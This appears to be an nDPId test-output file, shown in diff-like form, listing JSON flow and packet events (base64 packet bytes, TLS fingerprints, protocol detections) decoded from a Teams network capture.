00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"}
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041692578,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041692578,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041692611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041692611}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":180000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":180000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1587041693428,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1019,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1019,"pkt_l4_len":985,"thread_ts_msec":1587041693428,"pkt":"EBMx8Tl2KDc3AG3ICABFAAPt48gAAEART4\/AqAEGNHJNiMnhDZYD2eNwBl3+t6o2WT+OKw\/oTFMopoursiGTBsvvLvg3wuBfZT1pBB1vO2396s1T+U1VujmCqj4L5tMtU2F\/1TQzFXSUlw7M8VMfNQQRkYM68GVjRmInITISf9xExqdFNNQs5RQE95Yd7wUQ0WB34xO5EY6WIo8x\/N\/uDXPR3dWPSffY9Pjxt3AuIhSE\/33TPi9IZfwvBkn0Ytl+OD1doGxH0KzkYpDzBS9hB1dBsT+zr8uYQ4OitShMofb6WewMwiNNfNExsV6iWN3hyOrqzEPoHJ8xMa7bW1q9BLkbd5BDoIOv\/MoJUwfM2rHFjSZuGzr\/wQ6fSJlA+ga+XWQ5cCOxemM862mQg5uhFhBag2VuzDKpysLY0ZCqnKz91R2yhrxoXReoN9yIxCUIquc7SAW\/92cRId8y07O6L1X8x\/aDl3FC0Al6caV7h\/r8ddpLTlDH6yLNlYfOWE7QuJLs4lty891N9hHky+P7SbB6VN0+eXLlpdIKbixmAmCZ1p6\/DFecrkQrfBusU7fCQ0m5UtC7A9xyYw8qrbidfp8KJduef6Xu3BA4D0YD6FFqNyrfEvkjpJ+3rNXlm\/vqN6+pA7Pyjrxbc8hNlLHZHBWyirKyjtN28dUXzlP+LsRPGNdQvqJFK3pV96V25LmYF5yiAGBc2dVjL3CV3I8BZIc1iv9PSXq8u5cmF3NAvFW+ejj0aUJys0KqSuB+SsBchm0XJNdD1T31o3cnzHzdRkPqsYgQxN+TMH4xz2ipnYwRm5mpiVbDbtght4DZhZkINSjZm+P+w6KJ1sJkRZyTcItShxjipY0pc0YcI\/iPO8Kihnfm0h7aZYr8JbNTXfrRfggxMyqgTWxlobhHKsiboGB5nz9mqNXgN5f2w6aCT8Ygr4J\/d\/M8CNiCRT+CKMTqRpDBqIcnsL3KBgSmI2li51fHmCYLknW2Aw3F82bIDyzOvtteFfeZxum8+GIS5JvJh64JDL9hUaT9FEJ6txlWLszG+bg1use4IiVMiF2jfKWFA1eFZRDjiQXrMStv0vPT1Ma73OvVsZAHSptss39ti+ltbCNxC0S+MDiB1jQrFVUZ5nHLM44PsanYQ\/0cpyVO6zbbzjzXTUfs+tAIMkUNPFZtCs1rFpKhkI3NcGs+yvSb4SV1GxhoDHVRpRNuKqFbFinCHp\/37lAaE9HGUTnfhxGhnCIfOfHIUUAT3eHul9H3b0Z8OnLYIK1ZDLQGkd0pzOUxUVHtQtXMulhXsHz7fr\/A21yG\/8b8NgTEX+gU6e+h1l0XisCpHYMfVCMz3mHn3ia\/HdLRjG51YnI="} 01763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1587041693428,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1019,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1019,"pkt_l4_len":985,"thread_ts_msec":1587041693428,"pkt":"EBMx8Tl2KDc3AG3ICABFAAPt48gAAEART4\/AqAEGNHJNiMnhDZYD2eNwBl3+t6o2WT+OKw\/oTFMopoursiGTBsvvLvg3wuBfZT1pBB1vO2396s1T+U1VujmCqj4L5tMtU2F\/1TQzFXSUlw7M8VMfNQQRkYM68GVjRmInITISf9xExqdFNNQs5RQE95Yd7wUQ0WB34xO5EY6WIo8x\/N\/uDXPR3dWPSffY9Pjxt3AuIhSE\/33TPi9IZfwvBkn0Ytl+OD1doGxH0KzkYpDzBS9hB1dBsT+zr8uYQ4OitShMofb6WewMwiNNfNExsV6iWN3hyOrqzEPoHJ8xMa7bW1q9BLkbd5BDoIOv\/MoJUwfM2rHFjSZuGzr\/wQ6fSJlA+ga+XWQ5cCOxemM862mQg5uhFhBag2VuzDKpysLY0ZCqnKz91R2yhrxoXReoN9yIxCUIquc7SAW\/92cRId8y07O6L1X8x\/aDl3FC0Al6caV7h\/r8ddpLTlDH6yLNlYfOWE7QuJLs4lty891N9hHky+P7SbB6VN0+eXLlpdIKbixmAmCZ1p6\/DFecrkQrfBusU7fCQ0m5UtC7A9xyYw8qrbidfp8KJduef6Xu3BA4D0YD6FFqNyrfEvkjpJ+3rNXlm\/vqN6+pA7Pyjrxbc8hNlLHZHBWyirKyjtN28dUXzlP+LsRPGNdQvqJFK3pV96V25LmYF5yiAGBc2dVjL3CV3I8BZIc1iv9PSXq8u5cmF3NAvFW+ejj0aUJys0KqSuB+SsBchm0XJNdD1T31o3cnzHzdRkPqsYgQxN+TMH4xz2ipnYwRm5mpiVbDbtght4DZhZkINSjZm+P+w6KJ1sJkRZyTcItShxjipY0pc0YcI\/iPO8Kihnfm0h7aZYr8JbNTXfrRfggxMyqgTWxlobhHKsiboGB5nz9mqNXgN5f2w6aCT8Ygr4J\/d\/M8CNiCRT+CKMTqRpDBqIcnsL3KBgSmI2li51fHmCYLknW2Aw3F82bIDyzOvtteFfeZxum8+GIS5JvJh64JDL9hUaT9FEJ6txlWLszG+bg1use4IiVMiF2jfKWFA1eFZRDjiQXrMStv0vPT1Ma73OvVsZAHSptss39ti+ltbCNxC0S+MDiB1jQrFVUZ5nHLM44PsanYQ\/0cpyVO6zbbzjzXTUfs+tAIMkUNPFZtCs1rFpKhkI3NcGs+yvSb4SV1GxhoDHVRpRNuKqFbFinCHp\/37lAaE9HGUTnfhxGhnCIfOfHIUUAT3eHul9H3b0Z8OnLYIK1ZDLQGkd0pzOUxUVHtQtXMulhXsHz7fr\/A21yG\/8b8NgTEX+gU6e+h1l0XisCpHYMfVCMz3mHn3ia\/HdLRjG51YnI="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1587041693474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1587041693474,"pkt":"KDc3AG3IEBMx8Tl2CABFAABBNJIAAGwR1nE0ck2IwKgBBg2WyeEALeCzAzNiZmY2YTE1LTY4NDEtNDYwNy04YzI3LTllY2ViOWVlZDkzYg=="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1587041693474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1587041693474,"pkt":"KDc3AG3IEBMx8Tl2CABFAABBNJIAAGwR1nE0ck2IwKgBBg2WyeEALeCzAzNiZmY2YTE1LTY4NDEtNDYwNy04YzI3LTllY2ViOWVlZDkzYg=="}
@@ -409,8 +409,8 @@
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="} 